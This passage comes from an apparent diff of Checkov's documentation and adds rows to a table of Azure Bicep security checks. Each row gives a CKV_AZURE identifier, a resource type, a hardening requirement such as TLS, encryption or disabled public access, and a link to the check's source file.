[MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py) | +| 67 | CKV_AZURE_56 | resource | Microsoft.Web/sites/config | Ensure that function apps enables Authentication | Bicep | 
[FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py) | +| 68 | CKV_AZURE_57 | resource | Microsoft.Web/sites | Ensure that CORS disallows every resource to access app services | Bicep | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDisallowCORS.py) | +| 69 | CKV_AZURE_58 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces enables managed virtual networks | Bicep | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | +| 70 | CKV_AZURE_59 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage accounts disallow public access | Bicep | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py) | +| 71 | CKV_AZURE_62 | resource | Microsoft.Web/sites | Ensure function apps are not accessible from all regions | Bicep | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppDisallowCORS.py) | +| 72 | CKV_AZURE_63 | resource | Microsoft.Web/sites/config | Ensure that App service enables HTTP logging | Bicep | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py) | +| 73 | CKV_AZURE_64 | resource | Microsoft.StorageSync/storageSyncServices | Ensure that Azure File Sync disables public network access | Bicep | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py) | +| 74 | CKV_AZURE_65 | resource | Microsoft.Web/sites/config | Ensure that App service enables detailed error messages | Bicep | 
[AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py) |
+| 75 | CKV_AZURE_66 | resource | Microsoft.Web/sites/config | Ensure that App service enables failed request tracing | Bicep | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py) |
+| 76 | CKV_AZURE_67 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Bicep | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py) |
+| 77 | CKV_AZURE_67 | resource | Microsoft.Web/sites/slots | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Bicep | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py) |
+| 78 | CKV_AZURE_68 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server disables public network access | Bicep | [PostgreSQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerPublicAccessDisabled.py) |
+| 79 | CKV_AZURE_70 | resource | Microsoft.Web/sites | Ensure that Function apps is only accessible over HTTPS | Bicep | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py) |
+| 80 | CKV_AZURE_70 | resource | Microsoft.Web/sites/config | Ensure that Function apps is only accessible over HTTPS | Bicep | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py) |
+| 81 | CKV_AZURE_70 | resource | Microsoft.Web/sites/slots | Ensure that Function apps is only accessible over HTTPS | Bicep | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py) |
+| 82 | CKV_AZURE_71 | resource | Microsoft.Web/sites | Ensure that Managed identity provider is enabled for web apps | Bicep | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py) |
+| 83 | CKV_AZURE_72 | resource | Microsoft.Web/sites | Ensure that remote debugging is not enabled for app services | Bicep | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py) |
+| 84 | CKV_AZURE_73 | resource | Microsoft.Automation/automationAccounts/variables | Ensure that Automation account variables are encrypted | Bicep | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AutomationEncrypted.py) |
+| 85 | CKV_AZURE_74 | resource | Microsoft.Kusto/clusters | Ensure that Azure Data Explorer (Kusto) uses disk encryption | Bicep | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py) |
+| 86 | CKV_AZURE_75 | resource | Microsoft.Kusto/clusters | Ensure that Azure Data Explorer uses double encryption | Bicep | [AzureDataExplorerDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDataExplorerDoubleEncryptionEnabled.py) |
+| 87 | CKV_AZURE_76 | resource | Microsoft.Batch/batchAccounts | Ensure that Azure Batch account uses key vault to encrypt data | Bicep | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py) |
+| 88 | CKV_AZURE_78 | resource | Microsoft.Web/sites | Ensure FTP deployments are disabled | Bicep | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceFTPSState.py) |
+| 89 | CKV_AZURE_79 | resource | Microsoft.Security/pricings | Ensure that Azure Defender is set to On for SQL servers on machines | Bicep | [AzureDefenderOnSqlServersVMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnSqlServersVMS.py) |
+| 90 | CKV_AZURE_80 | resource | Microsoft.Web/sites/config | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Bicep | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py) |
+| 91 | CKV_AZURE_81 | resource | Microsoft.Web/sites | Ensure that 'PHP version' is the latest, if used to run the web app | Bicep | [AppServicePHPVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePHPVersion.py) |
+| 92 | CKV_AZURE_82 | resource | Microsoft.Web/sites | Ensure that 'Python version' is the latest, if used to run the web app | Bicep | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePythonVersion.py) |
+| 93 | CKV_AZURE_83 | resource | Microsoft.Web/sites | Ensure that 'Java version' is the latest, if used to run the web app | Bicep | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceJavaVersion.py) |
+| 94 | CKV_AZURE_84 | resource | Microsoft.Security/pricings | Ensure that Azure Defender is set to On for Storage | Bicep | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnStorage.py) |
+| 95 | CKV_AZURE_85 | resource | Microsoft.Security/pricings | Ensure that Azure Defender is set to On for Kubernetes | Bicep | [AzureDefenderOnKubernetes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnKubernetes.py) |
+| 96 | CKV_AZURE_87 | resource | Microsoft.Security/pricings | Ensure that Azure Defender is set to On for Key Vault | Bicep | [AzureDefenderOnKeyVaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnKeyVaults.py) |
+| 97 | CKV_AZURE_88 | resource | Microsoft.Web/sites/config | Ensure that app services use Azure Files | Bicep | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py) |
+| 98 | CKV_AZURE_89 | resource | Microsoft.Cache/redis | Ensure that Azure Cache for Redis disables public network access | Bicep | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py) |
+| 99 | CKV_AZURE_92 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual Machines use managed disks | Bicep | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMStorageOsDisk.py) |
+| 100 | CKV_AZURE_93 | resource | Microsoft.Compute/disks | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Bicep | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py) |
+| 101 | CKV_AZURE_94 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that My SQL server enables geo-redundant backups | Bicep | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py) |
+| 102 | CKV_AZURE_95 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | Bicep | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py) |
+| 103 | CKV_AZURE_96 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that MySQL server enables infrastructure encryption | Bicep | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py) |
+| 104 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine scale sets have encryption at host enabled | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) |
+| 105 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine scale sets have encryption at host enabled | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) |
+| 106 | CKV_AZURE_99 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure Cosmos DB accounts have restricted access | Bicep | [CosmosDBAccountsRestrictedAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBAccountsRestrictedAccess.py) |
+| 107 | CKV_AZURE_100 | resource | Microsoft.DocumentDb/databaseAccounts | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | Bicep | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py) |
+| 108 | CKV_AZURE_101 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Azure Cosmos DB disables public network access | Bicep | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py) |
+| 109 | CKV_AZURE_102 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables geo-redundant backups | Bicep | [PostgressSQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgressSQLGeoBackupEnabled.py) |
+| 110 | CKV_AZURE_103 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data Factory uses Git repository for source control | Bicep | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py) |
+| 111 | CKV_AZURE_104 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data factory public network access is disabled | Bicep | [DataFactoryNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryNoPublicNetworkAccess.py) |
+| 112 | CKV_AZURE_105 | resource | Microsoft.DataLakeStore/accounts | Ensure that Data Lake Store accounts enables encryption | Bicep | [DataLakeStoreEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataLakeStoreEncryption.py) |
+| 113 | CKV_AZURE_107 | resource | Microsoft.ApiManagement/service | Ensure that API management services use virtual networks | Bicep | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py) |
+| 114 | CKV_AZURE_109 | resource | Microsoft.KeyVault/vaults | Ensure that key vault allows firewall rules settings | Bicep | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py) |
+| 115 | CKV_AZURE_110 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables purge protection | Bicep | [KeyVaultEnablesPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesPurgeProtection.py) |
+| 116 | CKV_AZURE_111 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables soft delete | Bicep | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py) |
+| 117 | CKV_AZURE_112 | resource | Microsoft.KeyVault/vaults/keys | Ensure that key vault key is backed by HSM | Bicep | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py) |
+| 118 | CKV_AZURE_113 | resource | Microsoft.Sql/servers | Ensure that SQL server disables public network access | Bicep | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py) |
+| 119 | CKV_AZURE_114 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that key vault secrets have "content_type" set | Bicep | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py) |
+| 120 | CKV_AZURE_121 | resource | Microsoft.Network/frontDoors | Ensure that Azure Front Door enables WAF | Bicep | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py) |
+| 121 | CKV_AZURE_123 | resource | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | Bicep | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py) |
+| 122 | CKV_AZURE_125 | resource | Microsoft.ServiceFabric/clusters | Ensures that Service Fabric use three levels of protection available | Bicep | [AzureServiceFabricClusterProtectionLevel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureServiceFabricClusterProtectionLevel.py) |
+| 123 | CKV_AZURE_129 | resource | Microsoft.DBforMariaDB/servers | Ensure that MariaDB server enables geo-redundant backups | Bicep | [MariaDBGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBGeoBackupEnabled.py) |
+| 124 | CKV_AZURE_130 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables infrastructure encryption | Bicep | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py) |
+| 125 | CKV_AZURE_131 | parameter | string | SecureString parameter should not have hardcoded default values | Bicep | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/param/azure/SecureStringParameterNoHardcodedValue.py) |
+| 126 | CKV_AZURE_132 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | Bicep | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py) |
+| 127 | CKV_AZURE_133 | resource | Microsoft.Network/frontdoorWebApplicationFirewallPolicies | Ensure Front Door WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Bicep | [FrontDoorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontDoorWAFACLCVE202144228.py) |
+| 128 | CKV_AZURE_134 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable public network access | Bicep | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py) |
+| 129 | CKV_AZURE_135 | resource | Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies | Ensure Application Gateway WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Bicep | [AppGatewayWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppGatewayWAFACLCVE202144228.py) |
+| 130 | CKV_AZURE_137 | resource | Microsoft.ContainerRegistry/registries | Ensure ACR admin account is disabled | Bicep | [ACRAdminAccountDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRAdminAccountDisabled.py) |
+| 131 | CKV_AZURE_138 | resource | Microsoft.ContainerRegistry/registries | Ensures that ACR disables anonymous pulling of images | Bicep | [ACRAnonymousPullDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRAnonymousPullDisabled.py) |
+| 132 | CKV_AZURE_139 | resource | Microsoft.ContainerRegistry/registries | Ensure ACR set to disable public networking | Bicep | [ACRPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRPublicNetworkAccessDisabled.py) |
+| 133 | CKV_AZURE_140 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Local Authentication is disabled on CosmosDB | Bicep | [CosmosDBLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBLocalAuthDisabled.py) |
+| 134 | CKV_AZURE_141 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS local admin account is disabled | Bicep | [AKSLocalAdminDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLocalAdminDisabled.py) |
+| 135 | CKV_AZURE_145 | resource | Microsoft.Web/sites | Ensure Function app is using the latest version of TLS encryption | Bicep | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py) |
+| 136 | CKV_AZURE_145 | resource | Microsoft.Web/sites/slots | Ensure Function app is using the latest version of TLS encryption | Bicep | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py) |
+| 137 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine does not enable password authentication | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) |
+| 138 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine does not enable password authentication | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) |
+| 139 | CKV_AZURE_151 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables encryption | Bicep | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py) |
+| 140 | CKV_AZURE_153 | resource | Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Bicep | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotHTTPSOnly.py) |
+| 141 | CKV_AZURE_153 | resource | Microsoft.Web/sites/slots | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Bicep | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotHTTPSOnly.py) |
+| 142 | CKV_AZURE_155 | resource | Microsoft.Web/sites | Ensure debugging is disabled for the App service slot | Bicep | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotDebugDisabled.py) |
+| 143 | CKV_AZURE_155 | resource | Microsoft.Web/sites/slots | Ensure debugging is disabled for the App service slot | Bicep | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotDebugDisabled.py) |
+| 144 | CKV_AZURE_157 | resource | Microsoft.Synapse/workspaces | Ensure that Synapse workspace has data_exfiltration_protection_enabled | Bicep | [SynapseWorkspaceEnablesDataExfilProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesDataExfilProtection.py) |
+| 145 | CKV_AZURE_158 | resource | Microsoft.Databricks/workspaces | Ensure Databricks Workspace data plane to control plane communication happens over private link | Bicep | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py) |
+| 146 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups | Ensure that HTTP (port 80) access is restricted from the internet | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) |
+| 147 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that HTTP (port 80) access is restricted from the internet | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) |
+| 148 | CKV_AZURE_163 | resource | Microsoft.ContainerRegistry/registries | Enable vulnerability scanning for container images. | Bicep | [ACRContainerScanEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRContainerScanEnabled.py) |
+| 149 | CKV_AZURE_166 | resource | Microsoft.ContainerRegistry/registries | Ensure container image quarantine, scan, and mark images verified | Bicep | [ACREnableImageQuarantine.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACREnableImageQuarantine.py) |
+| 150 | CKV_AZURE_168 | resource | Microsoft.ContainerService/managedClusters | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. | Bicep | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSMaxPodsMinimum.py) |
+| 151 | CKV_AZURE_168 | resource | Microsoft.ContainerService/managedClusters/agentPools | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. | Bicep | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSMaxPodsMinimum.py) |
+| 152 | CKV_AZURE_169 | resource | Microsoft.ContainerService/managedClusters | Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets | Bicep | [AKSPoolTypeIsScaleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSPoolTypeIsScaleSet.py) |
+| 153 | CKV_AZURE_171 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster upgrade channel is chosen | Bicep | [AKSUpgradeChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSUpgradeChannel.py) |
+| 154 | CKV_AZURE_172 | resource | Microsoft.ContainerService/managedClusters | Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters | Bicep | [AkSSecretStoreRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AkSSecretStoreRotation.py) |
+| 155 | CKV_AZURE_173 | resource | Microsoft.ApiManagement/service | Ensure API management uses at least TLS 1.2 | Bicep | [APIManagementMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIManagementMinTLS12.py) |
+| 156 | CKV_AZURE_174 | resource | Microsoft.ApiManagement/service | Ensure API management public access is disabled | Bicep | [APIManagementPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIManagementPublicAccess.py) |
+| 157 | CKV_AZURE_175 | resource | Microsoft.SignalRService/webPubSub | Ensure Web PubSub uses a SKU with an SLA | Bicep | [PubsubSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PubsubSKUSLA.py) |
+| 158 | CKV_AZURE_176 | resource | Microsoft.SignalRService/webPubSub | Ensure Web PubSub uses managed identities to access Azure resources | Bicep | [PubsubSpecifyIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PubsubSpecifyIdentity.py) |
+| 159 | CKV_AZURE_177 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Windows VM enables automatic updates | Bicep | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMAutomaticUpdates.py) |
+| 160 | CKV_AZURE_177 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables automatic updates | Bicep | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMAutomaticUpdates.py) |
+| 161 | CKV_AZURE_178 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure linux VM enables SSH with keys for secure communication | Bicep | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/LinuxVMUsesSSH.py) |
+| 162 | CKV_AZURE_178 | resource | Microsoft.Compute/virtualMachines | Ensure linux VM enables SSH with keys for secure communication | Bicep | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/LinuxVMUsesSSH.py) |
+| 163 | CKV_AZURE_182 | resource | Microsoft.Network/networkInterfaces | Ensure that VNET has at least 2 connected DNS Endpoints | Bicep | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VnetSingleDNSServer.py) |
+| 164 | CKV_AZURE_182 | resource | Microsoft.Network/virtualNetworks | Ensure that VNET has at least 2 connected DNS Endpoints | Bicep | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VnetSingleDNSServer.py) |
+| 165 | CKV_AZURE_183 | resource | Microsoft.Network/virtualNetworks | Ensure that VNET uses local DNS addresses | Bicep | [VnetLocalDNS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VnetLocalDNS.py) |
+| 166 | CKV_AZURE_189 | resource | Microsoft.KeyVault/vaults | Ensure that Azure Key Vault disables public network access | Bicep | [KeyVaultDisablesPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultDisablesPublicNetworkAccess.py) |
+| 167 | CKV_AZURE_191 | resource | Microsoft.EventGrid/topics | Ensure that Managed identity provider is enabled for Azure Event Grid Topic | Bicep | [EventgridTopicIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventgridTopicIdentityProviderEnabled.py) |
+| 168 | CKV_AZURE_192 | resource | Microsoft.EventGrid/topics | Ensure that Azure Event Grid Topic local Authentication is disabled | Bicep | [EventgridTopicLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventgridTopicLocalAuthentication.py) |
+| 169 | CKV_AZURE_193 | resource | Microsoft.EventGrid/topics | Ensure public network access is disabled for Azure Event Grid Topic | Bicep | [EventgridTopicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventgridTopicNetworkAccess.py) |
+| 170 | CKV_AZURE_206 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage Accounts use replication | Bicep | [StorageAccountsUseReplication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountsUseReplication.py) |
+| 171 | CKV_AZURE_208 | resource | Microsoft.Search/searchServices | Ensure that Azure Cognitive Search maintains SLA for index updates | Bicep | [AzureSearchSLAIndex.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSearchSLAIndex.py) |
+| 172 | CKV_AZURE_209 | resource | Microsoft.Search/searchServices | Ensure that Azure Cognitive Search maintains SLA for search index queries | Bicep | [AzureSearchSLAQueryUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSearchSLAQueryUpdates.py) |
